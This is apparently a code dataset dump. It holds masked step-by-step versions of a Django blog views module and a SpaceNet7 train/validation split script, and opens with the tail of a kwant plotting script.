dict(GammaLead = parametros[\"GammaC\"], V = 100, **parametros )\n wf = kwant.wave_function(syst, energy = energia, params = parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n # modes_total = np.vstack((wf(0), wf(1)))\n\n\n # Calculate the density:\n sigma_z = tinyarray.array([[1,0],[0,-1]])\n spin_proj= np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n\n\n # Calculate dos in a line\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0),wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n # print(dos_in_line.shape)\n # print(dos_in_line)\n plot_dos_in_line(dos_in_line_from_left)\n # plot_dos_in_line(dos_in_line_from_both)\n print(sum(dos_in_line_from_both).shape)\n\n\n # Plot the results:\n colorRight = \"seismic\"\n colorLeft = \"seismic\"\n fig, ax = plt.subplots(2,2,figsize=(14,6))\n y_values_left = y_values_left * (shapes.A0 / 10) # conversion to nm^{-1}\n y_values_right = y_values_right * (shapes.A0 / 10) # conversion to nm^{-1}\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n\n map_density(ax[0][0], syst, psi_left, colormap = 
colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle = \"--\")\n ax[0][0].set_title(\"left lead\")\n map_density(ax[1][0], syst, psi_right, colormap = colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle = \"--\")\n ax[1][0].set_title(\"right lead\")\n\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left),\n marker = \".\", markersize = 2.5, linestyle = \"-\" )\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right),\n marker = \".\", markersize = 2.5, linestyle = \"-\" )\n plt.tight_layout()\n plt.show()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator
from .models import Blog, BlogType
from django.conf import settings
from read_statistics.utils import read_statistics_once_read
from user.forms import LoginForm
# Create your views here.
# pagination helper shared by the list views
def get_blogs_common_data(request, blogs_all_list):
    # paginator
page_num = request.GET.get('page', 1)
paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)
page_of_blogs = paginator.get_page(page_num)
current_page_num = page_of_blogs.number
page_range = list(range(max(1, current_page_num - 2), min(paginator.num_pages + 1, current_page_num + 3)))
if page_range[0] != 1:
page_range.insert(0, 1)
if page_range[1] - page_range[0] >= 2:
page_range.insert(1, '...')
if page_range[-1] != paginator.num_pages:
page_range.append(paginator.num_pages)
if page_range[-1] - page_range[-2] >= 2:
page_range.insert(-1, '...')
    # blog counts per month for the date archive
blog_dates = dict()
all_dates = Blog.objects.dates('created_time', 'month', order='DESC')
for blogs_date in all_dates:
blogs_count = Blog.objects.filter(created_time__year=blogs_date.year,
created_time__month=blogs_date.month).count()
blog_dates[blogs_date] = blogs_count
    # assemble the common context data
context = dict()
context['blogs'] = page_of_blogs
context['page_range'] = page_range
    # annotate could be used to attach a blog_count to each BlogType (see the line below)
#context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))
context['blog_types'] = BlogType.objects.all()
context['blog_dates'] = blog_dates
return context
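
# Worked example of the page_range logic above: with 10 pages and current page 5 the
# window is [3, 4, 5, 6, 7]; 1 and 10 are added at the ends, and because the gaps to
# 3 and from 7 are at least two pages an '...' is inserted on each side, giving
# [1, '...', 3, 4, 5, 6, 7, '...', 10].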
def blog_list(request):
blogs_all_list = Blog.objects.all()
context = get_blogs_common_data(request, blogs_all_list)
return render(request, 'blog/blog_list.html', context)
def blogs_with_type(request, blog_type_pk):
blog_type = get_object_or_404(BlogType, pk=blog_type_pk)
blogs_all_list = Blog.objects.filter(blog_type=blog_type)
context = get_blogs_common_data(request, blogs_all_list)
context['blog_type'] = blog_type
return render(request, 'blog/blogs_with_type.html', context)
def blogs_with_date(request, year, month):
blogs_all_list = Blog.objects.filter(created_time__year=year, created_time__month=month)
context = get_blogs_common_data(request, blogs_all_list)
context['blogs_with_date'] = '%s年%s' % (year, month)
return render(request, 'blog/blogs_with_date.html', context)
def blog_detail(request, blog_pk):
blog = get_object_or_404(Blog, pk=blog_pk)
read_cookie_key = read_statistics_once_read(request, blog)
context = dict()
context['blog'] = blog
context['blog_author'] = blog.author.get_nickname_or_username()
context['login_form'] = LoginForm()
context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.created_time).last()
context['next_blog'] = Blog.objects.filter(created_time__lt=blog.created_time).first()
context['blog_dates'] = Blog.objects.dates('created_time', 'month', order='DESC')
response = render(request, 'blog/blog_detail.html', context)
response.set_cookie(read_cookie_key, 'true')
return response
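
# A minimal urls.py sketch these views could be wired to (route names and paths are
# assumptions, not taken from the project):
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.blog_list, name='blog_list'),
#     path('type/<int:blog_type_pk>/', views.blogs_with_type, name='blogs_with_type'),
#     path('date/<int:year>/<int:month>/', views.blogs_with_date, name='blogs_with_date'),
#     path('<int:blog_pk>/', views.blog_detail, name='blog_detail'),
# ]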
|
normal
|
{
"blob_id": "9731f45b19d40a031216f8a430c09764fd34e984",
"index": 2594,
"step-1": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\n<mask token>\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-2": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\n<mask token>\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-3": "<mask token>\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year,\n created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-4": "from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom .models import Blog, BlogType\nfrom django.conf import settings\nfrom read_statistics.utils import read_statistics_once_read\nfrom user.forms import LoginForm\n\n\ndef get_blogs_common_data(request, blogs_all_list):\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.\n num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.\n year, created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year,\n created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.\n created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.\n created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month',\n order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response\n",
"step-5": "from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom .models import Blog, BlogType\nfrom django.conf import settings\nfrom read_statistics.utils import read_statistics_once_read\nfrom user.forms import LoginForm\n\n# Create your views here.\n#分页函数\ndef get_blogs_common_data(request, blogs_all_list):\n # 分页器\n page_num = request.GET.get('page', 1)\n paginator = Paginator(blogs_all_list, settings.BLOGS_PER_PAGE)\n page_of_blogs = paginator.get_page(page_num)\n current_page_num = page_of_blogs.number\n page_range = list(range(max(1, current_page_num - 2), min(paginator.num_pages + 1, current_page_num + 3)))\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[1] - page_range[0] >= 2:\n page_range.insert(1, '...')\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n if page_range[-1] - page_range[-2] >= 2:\n page_range.insert(-1, '...')\n # 获取日期归档的博客统计数量\n blog_dates = dict()\n all_dates = Blog.objects.dates('created_time', 'month', order='DESC')\n for blogs_date in all_dates:\n blogs_count = Blog.objects.filter(created_time__year=blogs_date.year,\n created_time__month=blogs_date.month).count()\n blog_dates[blogs_date] = blogs_count\n\n # 获取公共的数据\n context = dict()\n context['blogs'] = page_of_blogs\n context['page_range'] = page_range\n # 运用annotate方法给对象添加注释\n #context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))\n context['blog_types'] = BlogType.objects.all()\n context['blog_dates'] = blog_dates\n return context\n\ndef blog_list(request):\n blogs_all_list = Blog.objects.all()\n context = get_blogs_common_data(request, blogs_all_list)\n return render(request, 'blog/blog_list.html', context)\n\ndef blogs_with_type(request, blog_type_pk):\n blog_type = get_object_or_404(BlogType, pk=blog_type_pk)\n blogs_all_list = Blog.objects.filter(blog_type=blog_type)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blog_type'] = blog_type\n return render(request, 'blog/blogs_with_type.html', context)\n\ndef blogs_with_date(request, year, month):\n blogs_all_list = Blog.objects.filter(created_time__year=year, created_time__month=month)\n context = get_blogs_common_data(request, blogs_all_list)\n context['blogs_with_date'] = '%s年%s' % (year, month)\n return render(request, 'blog/blogs_with_date.html', context)\n\ndef blog_detail(request, blog_pk):\n blog = get_object_or_404(Blog, pk=blog_pk)\n read_cookie_key = read_statistics_once_read(request, blog)\n context = dict()\n context['blog'] = blog\n context['blog_author'] = blog.author.get_nickname_or_username()\n context['login_form'] = LoginForm()\n context['pre_blog'] = Blog.objects.filter(created_time__gt=blog.created_time).last()\n context['next_blog'] = Blog.objects.filter(created_time__lt=blog.created_time).first()\n context['blog_dates'] = Blog.objects.dates('created_time', 'month', order='DESC')\n response = render(request, 'blog/blog_detail.html', context)\n response.set_cookie(read_cookie_key, 'true')\n return response",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
#!/usr/bin/env python3
import argparse
import json
import os
import random
import timeit
from glob import glob
import numpy as np
def parse_args():
"""[summary]
Returns:
[type]: [description]
"""
parser = argparse.ArgumentParser()
parser.add_argument('--train_dir',
help='directory containing spacenet7 train dataset',
default='/data/spacenet7/spacenet7/train/')
parser.add_argument('--mask_dir',
help='directory containing building mask image files',
default='/data/spacenet7/building_masks/')
parser.add_argument('--out_dir',
help='output root directory',
default='/data/spacenet7/split/')
parser.add_argument('--split_num',
help='number of split',
type=int,
default=5)
return parser.parse_args()
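
# Example invocation (the script name is illustrative; the defaults match the paths above):
#   python split_spacenet7.py --train_dir /data/spacenet7/spacenet7/train/ \
#       --mask_dir /data/spacenet7/building_masks/ --out_dir /data/spacenet7/split/ --split_num 5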
def dump_file_paths(aois, output_path, train_dir, mask_dir):
"""[summary]
Args:
aois ([type]): [description]
output_path ([type]): [description]
train_dir ([type]): [description]
mask_dir ([type]): [description]
"""
results = []
for aoi in aois:
image_paths = glob(
os.path.join(train_dir, aoi, 'images_masked', '*.tif'))
image_paths.sort()
N = len(image_paths)
for i in range(N):
# get path to mask
image_path = image_paths[i]
filename = os.path.basename(image_path)
mask_path = os.path.join(mask_dir, aoi, filename)
assert os.path.exists(mask_path)
# previous frame
image_prev_path = image_paths[0] if i == 0 \
else image_paths[i - 1]
# next frame
image_next_path = image_paths[N - 1] if i == N - 1 \
else image_paths[i + 1]
result = {}
result['image_masked'] = image_path
result['building_mask'] = mask_path
result['image_masked_prev'] = image_prev_path
result['image_masked_next'] = image_next_path
results.append(result)
with open(output_path, 'w') as f:
json.dump(results,
f,
ensure_ascii=False,
indent=4,
sort_keys=False,
separators=(',', ': '))
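
# Each entry in the dumped JSON has the shape below (paths are illustrative only):
# {
#     "image_masked": "<train_dir>/<aoi>/images_masked/<frame>.tif",
#     "building_mask": "<mask_dir>/<aoi>/<frame>.tif",
#     "image_masked_prev": "<previous frame, or the same frame if it is the first>",
#     "image_masked_next": "<next frame, or the same frame if it is the last>"
# }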
if __name__ == '__main__':
t0 = timeit.default_timer()
args = parse_args()
os.makedirs(args.out_dir)
aois = sorted([
d for d in os.listdir(args.train_dir)
if os.path.isdir(os.path.join(args.train_dir, d))
])
random.seed(777)
random.shuffle(aois)
# split aois into train and val
n = args.split_num
aois_divided = np.array([aois[i::n] for i in range(n)])
for val_idx in range(n):
# dump file paths for val split
val_aois = aois_divided[val_idx]
dump_file_paths(val_aois,
os.path.join(args.out_dir, f'val_{val_idx}.json'),
args.train_dir, args.mask_dir)
# dump file paths for train split
train_mask = np.ones(n, dtype=bool)
train_mask[val_idx] = False
train_aois = aois_divided[train_mask]
train_aois = np.concatenate(train_aois, axis=0).tolist()
dump_file_paths(train_aois,
os.path.join(args.out_dir, f'train_{val_idx}.json'),
args.train_dir, args.mask_dir)
elapsed = timeit.default_timer() - t0
print('Time: {:.3f} min'.format(elapsed / 60.0))
|
normal
|
{
"blob_id": "71eadf5073b5ed13c7d4a58b2aeb52f550a32238",
"index": 3104,
"step-1": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n args = parse_args()\n os.makedirs(args.out_dir)\n aois = sorted([d for d in os.listdir(args.train_dir) if os.path.isdir(\n os.path.join(args.train_dir, d))])\n random.seed(777)\n random.shuffle(aois)\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n for val_idx in range(n):\n val_aois = aois_divided[val_idx]\n dump_file_paths(val_aois, os.path.join(args.out_dir,\n f'val_{val_idx}.json'), args.train_dir, args.mask_dir)\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n dump_file_paths(train_aois, os.path.join(args.out_dir,\n f'train_{val_idx}.json'), args.train_dir, args.mask_dir)\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
"step-4": "import argparse\nimport json\nimport os\nimport random\nimport timeit\nfrom glob import glob\nimport numpy as np\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir', help=\n 'directory containing spacenet7 train dataset', default=\n '/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir', help=\n 'directory containing building mask image files', default=\n '/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir', help='output root directory', default=\n '/data/spacenet7/split/')\n parser.add_argument('--split_num', help='number of split', type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n results = []\n for aoi in aois:\n image_paths = glob(os.path.join(train_dir, aoi, 'images_masked',\n '*.tif'))\n image_paths.sort()\n N = len(image_paths)\n for i in range(N):\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n image_prev_path = image_paths[0] if i == 0 else image_paths[i - 1]\n image_next_path = image_paths[N - 1\n ] if i == N - 1 else image_paths[i + 1]\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n with open(output_path, 'w') as f:\n json.dump(results, f, ensure_ascii=False, indent=4, sort_keys=False,\n separators=(',', ': '))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n args = parse_args()\n os.makedirs(args.out_dir)\n aois = sorted([d for d in os.listdir(args.train_dir) if os.path.isdir(\n os.path.join(args.train_dir, d))])\n random.seed(777)\n random.shuffle(aois)\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n for val_idx in range(n):\n val_aois = aois_divided[val_idx]\n dump_file_paths(val_aois, os.path.join(args.out_dir,\n f'val_{val_idx}.json'), args.train_dir, args.mask_dir)\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n dump_file_paths(train_aois, os.path.join(args.out_dir,\n f'train_{val_idx}.json'), args.train_dir, args.mask_dir)\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
"step-5": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport random\nimport timeit\nfrom glob import glob\n\nimport numpy as np\n\n\ndef parse_args():\n \"\"\"[summary]\n\n Returns:\n [type]: [description]\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_dir',\n help='directory containing spacenet7 train dataset',\n default='/data/spacenet7/spacenet7/train/')\n parser.add_argument('--mask_dir',\n help='directory containing building mask image files',\n default='/data/spacenet7/building_masks/')\n parser.add_argument('--out_dir',\n help='output root directory',\n default='/data/spacenet7/split/')\n parser.add_argument('--split_num',\n help='number of split',\n type=int,\n default=5)\n return parser.parse_args()\n\n\ndef dump_file_paths(aois, output_path, train_dir, mask_dir):\n \"\"\"[summary]\n\n Args:\n aois ([type]): [description]\n output_path ([type]): [description]\n train_dir ([type]): [description]\n mask_dir ([type]): [description]\n \"\"\"\n\n results = []\n\n for aoi in aois:\n image_paths = glob(\n os.path.join(train_dir, aoi, 'images_masked', '*.tif'))\n image_paths.sort()\n\n N = len(image_paths)\n for i in range(N):\n # get path to mask\n image_path = image_paths[i]\n filename = os.path.basename(image_path)\n mask_path = os.path.join(mask_dir, aoi, filename)\n assert os.path.exists(mask_path)\n\n # previous frame\n image_prev_path = image_paths[0] if i == 0 \\\n else image_paths[i - 1]\n\n # next frame\n image_next_path = image_paths[N - 1] if i == N - 1 \\\n else image_paths[i + 1]\n\n result = {}\n result['image_masked'] = image_path\n result['building_mask'] = mask_path\n result['image_masked_prev'] = image_prev_path\n result['image_masked_next'] = image_next_path\n results.append(result)\n\n with open(output_path, 'w') as f:\n json.dump(results,\n f,\n ensure_ascii=False,\n indent=4,\n sort_keys=False,\n separators=(',', ': '))\n\n\nif __name__ == '__main__':\n t0 = timeit.default_timer()\n\n args = parse_args()\n\n os.makedirs(args.out_dir)\n\n aois = sorted([\n d for d in os.listdir(args.train_dir)\n if os.path.isdir(os.path.join(args.train_dir, d))\n ])\n\n random.seed(777)\n random.shuffle(aois)\n\n # split aois into train and val\n n = args.split_num\n aois_divided = np.array([aois[i::n] for i in range(n)])\n\n for val_idx in range(n):\n # dump file paths for val split\n val_aois = aois_divided[val_idx]\n\n dump_file_paths(val_aois,\n os.path.join(args.out_dir, f'val_{val_idx}.json'),\n args.train_dir, args.mask_dir)\n\n # dump file paths for train split\n train_mask = np.ones(n, dtype=bool)\n train_mask[val_idx] = False\n train_aois = aois_divided[train_mask]\n train_aois = np.concatenate(train_aois, axis=0).tolist()\n\n dump_file_paths(train_aois,\n os.path.join(args.out_dir, f'train_{val_idx}.json'),\n args.train_dir, args.mask_dir)\n\n elapsed = timeit.default_timer() - t0\n print('Time: {:.3f} min'.format(elapsed / 60.0))\n",
